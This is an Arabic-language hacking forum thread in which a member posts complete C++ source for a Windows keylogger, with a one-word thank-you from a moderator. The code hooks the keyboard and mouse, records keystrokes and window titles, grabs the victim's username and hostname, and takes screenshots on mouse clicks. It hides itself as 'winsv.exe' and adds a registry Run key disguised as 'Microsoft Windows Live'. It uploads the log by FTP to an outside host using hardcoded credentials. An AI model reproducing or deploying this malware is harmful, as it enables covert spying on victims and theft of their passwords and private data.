المشاركات اخر المواضيع الاكثر مشاهدة

En çok mesaj

0x007z

Beginner Hacker
إنضم
5 ديسمبر 2019
المشاركات
10
مستوى التفاعل
8
النقاط
3
العمر
22
كـيلوجـر { c++ }
ســـلام عليكم

لدي منذ فترة كيلوجر بلغة c++ جميل وقوي

قبل طرح سورس كود اتمنى من اعضاء فهم ميكانية عمل كيلوجر لاتطويره واكتساب خبرة

C++:
#include <windows.h>
#include <stdio.h>
#include <fstream>
#include <iostream>
#include <string.h>
#include <wininet.h>
#include <wingdi.h>

#pragma comment(lib,"ws2_32.lib")

#define visible // (visible / invisible)
#define FILELOG "svc.html"

#define FTP_USER "COLIBRAX"
#define FTP_PASS "[email protected]@1"
#define FTP_SERVER "files.000webhost.com"

#define DATA_SIZE 1024*1024*100 //100MB
#define MAXLINE 409600
#define MAX_LENGTH 1024

using namespace std;

//Global Keyboard Hook variable
HHOOK keyboardHook;
//Global Mouse Hook variable
HHOOK mouseHook;
//Global info computer
struct computer {
  
 TCHAR username[MAX_LENGTH+1];
 TCHAR hostname[MAX_LENGTH+1];
} ;

char lastwindow[256];

void getcomputerinfo(computer * victim);
void FileSubmit(char *,char *);
void WriteData(string Text);
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
void FileSubmit(char *localfile,char *remotefile);
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK MouseProc (int nCode, WPARAM wParam, LPARAM lParam);
void copyto(char *de,char *para,int init);
//screemshot
void TakeScreenShot(char * filename);
//save bmp to file
BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName);// WinMain, a função main em janelas
int WINAPI WinMain (HINSTANCE hThisInstance,
  HINSTANCE hPrevInstance,
  LPSTR lpszArgument,
  int nFunsterStil){
  
  
  
  HWND hwnd;   // O objeto para indicar a janela
  MSG messages;  // Objeto mensagem do Windows para controlar o acionamento de botões
  WNDCLASSEX wincl;  // O objeto para criar a janela
  
  computer * victim;
  victim = new computer();

  wincl.hInstance = hThisInstance;
  wincl.lpszClassName = "whs"; // Nome da classe da janela
  wincl.lpfnWndProc = WindowProcedure;
  wincl.style = CS_DBLCLKS;
  wincl.cbSize = sizeof (WNDCLASSEX);
  wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);   // Janela com icone default do Windows
  wincl.hCursor = LoadCursor (NULL, IDC_ARROW);     //Cursor default
  wincl.lpszMenuName = NULL;
  wincl.cbClsExtra = 0;
  wincl.cbWndExtra = 0;
  wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;    // Cor cinza de background
  
  if (!RegisterClassEx (&wincl)) // Se o registro da classe foi mal-sucedido return 0
    return 0;
  
  hwnd = CreateWindowEx (        // Criação da janela
    0,
    "whs",         // Indicação da classe da janela
    "WHS - MONITOR",         // Nome da janela
    WS_TILEDWINDOW ,      // Estilo da janela
    10,                // x em relação ao desktop
    10,                 // y em relação ao desktop
    800,                 // largura da janela
    600,                // altura da janela
    HWND_DESKTOP,
    NULL,
    hThisInstance,
    NULL
  );
  
  //pegar informações sobre a maquina
  getcomputerinfo(victim);
  
  
  //auto copia inicia
  char system[MAX_PATH];
  char windows[MAX_PATH];
  char pathtofile[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);
  GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
  GetSystemDirectory(system,sizeof(system));
  GetWindowsDirectory(windows,sizeof(windows));
  
  strcat(system,"\\winsv.exe");
  strcat(windows,"\\winsv.exe");
  copyto(pathtofile,system,true);
  copyto(pathtofile,windows,false);
  #ifdef visible
          // Mostrar a janela
      ShowWindow (hwnd, nFunsterStil);
  #endif
  
  //envia o log
  FileSubmit((char * )FILELOG,victim->username);


  //Initialise the keyboard Hook
  keyboardHook = SetWindowsHookEx( WH_KEYBOARD_LL, KeyboardProc, GetModuleHandle(NULL), 0 );
  mouseHook   = SetWindowsHookEx( WH_MOUSE_LL  , MouseProc  , GetModuleHandle(NULL), 0 );
  
  while (GetMessage (&messages, NULL, 0, 0)) // Recuperar mensagens
  {
    TranslateMessage(&messages);
    DispatchMessage(&messages);
  }
  
  UnhookWindowsHookEx(keyboardHook);
  UnhookWindowsHookEx(mouseHook);
  
  return 0;
}

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
  {
  switch (message)
  {
    case WM_CREATE: // Criação da janela
      CreateWindow(TEXT("STATIC"), TEXT("texto"), WS_CHILD |WS_HSCROLL| WS_VISIBLE | WS_BORDER, 1, 1, 800, 600, hwnd, NULL, NULL, NULL);
    break;
    case WM_COMMAND:  // Interpretação da janela
    break;
    case WM_DESTROY:  // Destruição da janela
      PostQuitMessage (0);
    break;
    default:
      return DefWindowProc (hwnd, message, wParam, lParam);
  }
  return 0;
}

void FileSubmit(char *localfile,char *remotefile)
{
  HINTERNET hInternet;
  HINTERNET hFtpSession;
  hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
  if (hInternet == NULL)
  {
    cout << "Error: " << GetLastError();
    
  }
  else
  {
    hFtpSession = InternetConnect(hInternet,FTP_SERVER, INTERNET_DEFAULT_FTP_PORT, FTP_USER, FTP_PASS, INTERNET_SERVICE_FTP, 0, 0);
    if (hFtpSession == NULL)
    {
      cout << "Error ftp: " << GetLastError();
    }
    else
    {

      if(FtpPutFile(hFtpSession, localfile, remotefile, FTP_TRANSFER_TYPE_BINARY, 0));
      
    }
  }
}

void TakeScreenShot(char * filename) {
 int x1, y1, x2, y2, w, h;

  // get screen dimensions
  x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
  y1 = GetSystemMetrics(SM_YVIRTUALSCREEN);
  x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN);
  y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN);
  w  = x2 - x1;
  h  = y2 - y1;

  // copy screen to bitmap
  HDC   hScreen = GetDC(NULL);
  HDC   hDC   = CreateCompatibleDC(hScreen);
  HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h);
  HGDIOBJ old_obj = SelectObject(hDC, hBitmap);
  BOOL  bRet  = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY);
  
  SaveHBITMAPToFile(hBitmap,filename);
  //CLEAN
  SelectObject(hDC, old_obj);
  DeleteDC(hDC);
  ReleaseDC(NULL, hScreen);
  DeleteObject(hBitmap);
};

BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
{
  string base64;
  HDC hDC;
  int iBits;
  WORD wBitCount;
  DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0;
  BITMAP Bitmap0;
  BITMAPFILEHEADER bmfHdr;
  BITMAPINFOHEADER bi;
  LPBITMAPINFOHEADER lpbi;
  HANDLE fh, hDib, hPal, hOldPal2 = NULL;
  hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
  iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES);
  DeleteDC(hDC);
  if (iBits <= 1)
    wBitCount = 1;
  else if (iBits <= 4)
    wBitCount = 4;
  else if (iBits <= 8)
    wBitCount = 8;
  else
    wBitCount = 24;
  GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0);
  bi.biSize = sizeof(BITMAPINFOHEADER);
  bi.biWidth = Bitmap0.bmWidth;
  bi.biHeight = -Bitmap0.bmHeight;
  bi.biPlanes = 1;
  bi.biBitCount = wBitCount;
  bi.biCompression = BI_RGB;
  bi.biSizeImage = 0;
  bi.biXPelsPerMeter = 0;
  bi.biYPelsPerMeter = 0;
  bi.biClrImportant = 0;
  bi.biClrUsed = 256;
  dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8
    * Bitmap0.bmHeight;
  hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER));
  lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib);
  *lpbi = bi;

  hPal = GetStockObject(DEFAULT_PALETTE);
  if (hPal)
  {
    hDC = GetDC(NULL);
    hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE);
    RealizePalette(hDC);
  }


  GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER)
    + dwPaletteSize, (BITMAPINFO *)lpbi, DIB_RGB_COLORS);

  if (hOldPal2)
  {
    SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE);
    RealizePalette(hDC);
    ReleaseDC(NULL, hDC);
  }

/* fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);

  if (fh == INVALID_HANDLE_VALUE)
    return FALSE;
*/
  bmfHdr.bfType = 0x4D42; // "BM"
  dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
  bmfHdr.bfSize = dwDIBSize;
  bmfHdr.bfReserved1 = 0;
  bmfHdr.bfReserved2 = 0;
  bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
/*
  base64.append("<img src=\"data:image/jpeg;base64,");
  base64.append((LPSTR)&bmfHdr);
  base64.append((LPSTR)&lpbi);
  cout<< base64;
*/
/* WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);

  WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
*/
  GlobalUnlock(hDib);
  GlobalFree(hDib);
  CloseHandle(fh);
  return TRUE;
}
 
 void virarTela(){
  
  DEVMODE mode;
  ZeroMemory(&mode, sizeof(mode));
  mode.dmSize = sizeof(mode);

  if (EnumDisplaySettings(NULL, ENUM_CURRENT_SETTINGS, &mode)){
    mode.dmDisplayOrientation = DMDO_180;

    if (ChangeDisplaySettings(&mode, 0) == DISP_CHANGE_SUCCESSFUL){
      Sleep(5000);
      //restore defaults
      mode.dmDisplayOrientation = DMDO_DEFAULT;
      ChangeDisplaySettings(&mode, 0);
    }
  }
 }
 
 void getcomputerinfo(computer * victim){
  
  
  DWORD size = MAX_LENGTH;
  GetComputerName(victim->hostname, &size);
  WriteData("hostname: ");
  WriteData(victim->hostname);
  WriteData("<br />");
  
  size = sizeof(victim->username) / sizeof(victim->username[0]);
  GetUserName(victim->username, &size);
  WriteData("username: ");
  WriteData(victim->username);
  WriteData("<br />");
  
}


void WriteData(string Text)
{
  ofstream LogFile;
  LogFile.open(FILELOG, fstream::app);
  LogFile << Text;
  LogFile.close();
}


bool SpecialCharacters(int vKey)
{
  //If Shift is pressed
  if (GetKeyState(VK_SHIFT) & 0x8000)
  {
     switch(vKey)
    {
      case 9:
        WriteData("<TAB>");
        break;
      case 8:
        WriteData("<BACKSPACE>");
        break;
      case 13:
        WriteData("\n<ENTER>");
        break;
      case 27:
        WriteData("<ESC>");
        break;
      case 46:
        WriteData("<DELETE>");
        break;
      case 48:
        WriteData(")");
        break;
      case 49:
        WriteData("!");
        break;
      case 50:
        WriteData("@");
        break;
      case 51:
        WriteData("#");
        break;
      case 52:
        WriteData("$");
        break;
      case 53:
        WriteData("%");
        break;
      case 54:
        WriteData("^");
        break;
      case 55:
        WriteData("&");
        break;
      case 56:
        WriteData("*");
        break;
      case 57:
        WriteData("(");
        break;
      case -64:
        WriteData("~");
        break;
      case -67:
        WriteData("_");
        break;
      case -69:
        WriteData("+");
        break;
      case -70:
        WriteData(":");
        break;
      case -34:
        WriteData("\"");
        break;
      case -68:
        WriteData("<");
        break;
      case -66:
        WriteData(">");
        break;
      case -65:
        WriteData("?");
        break;
      default:
        return false;
    }
    return true;
  }
  //If Shift is unpressed
  else
  {
    if (vKey > 47 && vKey < 58)
    {
      switch (vKey)
      {
        case 48:
          WriteData("0");
          break;
        case 49:
          WriteData("1");
          break;
        case 50:
          WriteData("2");
          break;
        case 51:
          WriteData("3");
          break;
        case 52:
          WriteData("4");
          break;
        case 53:
          WriteData("5");
          break;
        case 54:
          WriteData("6");
          break;
        case 55:
          WriteData("7");
          break;
        case 56:
          WriteData("8");
          break;
        case 57:
          WriteData("9");
          break;

      }
    }
    switch (vKey)
    {
      case 9:
        WriteData("<TAB>");
        break;
      case 8:
        WriteData("<BACKSPACE>");
        break;
      case 13:
        WriteData("\n<ENTER>");
        break;
      case 32:
        WriteData(" ");
        break;
      case -95:
        WriteData("<SHIFT>");
        break;
      case -96:
        WriteData("<SHIFT>");
        break;
      case -66:
        WriteData(".");
        break;
      case -68:
        WriteData(",");
        break;
      case -67:
        WriteData("-");
        break;
      case 27:
        WriteData("<ESC>");
        break;
      case -69:
        WriteData("=");
        break;
      case 38:
        WriteData("[Cima]");
        break;
      case 40:
        WriteData("[Baixo>]");
        break;
      case 37:
        WriteData("[Esquerda]");
        break;
      case 39:
        WriteData("[Direita]");
        break;
      case 46:
        WriteData("<DELETE>");
        break;
      case -70:
        WriteData(";");
        break;
      case -34:
        WriteData("'");
        break;
      default:
        return false;
    }
    return true;
  }
}


void Log(char Key)
{
  char log[255];
  HWND foreground = GetForegroundWindow();
  if (foreground)
  {
    char window_title[256];
    GetWindowText(foreground, window_title, 256);
    
    if(strcmp(window_title, lastwindow)!=0) {
      strcpy(lastwindow, window_title);
      
      sprintf(log,"%s<br/><a>",log);
      sprintf(log,"%s%s",log,lastwindow);
      sprintf(log,"%s</a>",log);
    }
  }
  //Check for special characters (Shift, Enter etc.)
  
  if (SpecialCharacters(Key) == false)
  {
    //If not special character check A-Z
    if (Key > 64 && Key < 91)
    {
      //If Shift AND Caps Lock = Lowercase
      if (GetKeyState(VK_SHIFT) & 0x8000 && (GetKeyState(VK_CAPITAL) & 0x0001)!=0)
      {
        Key += 32;
        sprintf(log,"%s%c",log,Key);
      }
      //If Shift OR Caps Lock = Uppercase
      else if (GetKeyState(VK_SHIFT) & 0x8000 || (GetKeyState(VK_CAPITAL) & 0x0001)!=0)
      {
        
        sprintf(log,"%s%c",log,Key);
      }
      //No Shift or Caps Lock = Lowercase
      else
      {
        Key += 32;
        sprintf(log,"%s%c",log,Key);
      }
    } else {
      if(Key>95&&Key<106){//numerico numpad
        Key-=48;
        sprintf(log,"%s%c",log,Key);
       } else {
        switch(Key){
          case 110:
            sprintf(log,"%s,",log, Key );
          break;
          case -62:
            sprintf(log,"%s.",log, Key );
          break;
          case 111:
            sprintf(log,"%s/",log, Key );
          break;
          case 106:
            sprintf(log,"%s*",log, Key );
          break;
          case 109:
            sprintf(log,"%s-",log, Key );
          break;
          case 107:
            sprintf(log,"%s+",log, Key );
          break;
          default:
            printf(log,"%s \nE-%d",log, Key );
          break;
        
        } 
      }
    }
    
  }
   WriteData(log);
   sprintf(log,"");
}

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
  PKBDLLHOOKSTRUCT key = (PKBDLLHOOKSTRUCT)lParam;
  if (wParam == WM_KEYDOWN && nCode == HC_ACTION )
  {
    //Pass keystroke character into Log function
    char Key = key->vkCode;
    Log(Key);
  }
  //Wait for next keystroke
  return CallNextHookEx(keyboardHook, nCode, wParam, lParam);
}

LRESULT CALLBACK MouseProc (int nCode, WPARAM wParam, LPARAM lParam)
{
  MOUSEHOOKSTRUCT * pMouseStruct = (MOUSEHOOKSTRUCT *)lParam;
  if (pMouseStruct != NULL){
    if(wParam == WM_LBUTTONDOWN)
    {
      TakeScreenShot((char *)"test.bmp");
      //printf( "clicked" );
    }
    //printf("Mouse position X = %d Mouse Position Y = %d\n", pMouseStruct->pt.x,pMouseStruct->pt.y);
  }
  return CallNextHookEx(mouseHook, nCode, wParam, lParam);
}

void copyto(char *de,char *para,int init)
{
  CopyFile((LPCSTR)de,(LPCSTR)para,false);
  HKEY hKey;
  if(init){
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
    RegSetValueEx(hKey, "Microsoft Windows Live",0,REG_SZ,(const unsigned char*)para,sizeof(para));
    RegCloseKey(hKey);
  }
  SetFileAttributesA((LPCSTR)para,FILE_ATTRIBUTE_HIDDEN);
}
 

assdsiwi

:: Super Moderator ::
إنضم
22 مارس 2019
المشاركات
365
مستوى التفاعل
555
النقاط
93
كـيلوجـر { c++ }
تسلم
 
مواضيع مماثلة المنتدى التاريخ
yaser iraq الـقـسـم الـعـام 0 157

مواضيع مماثلة

أعلى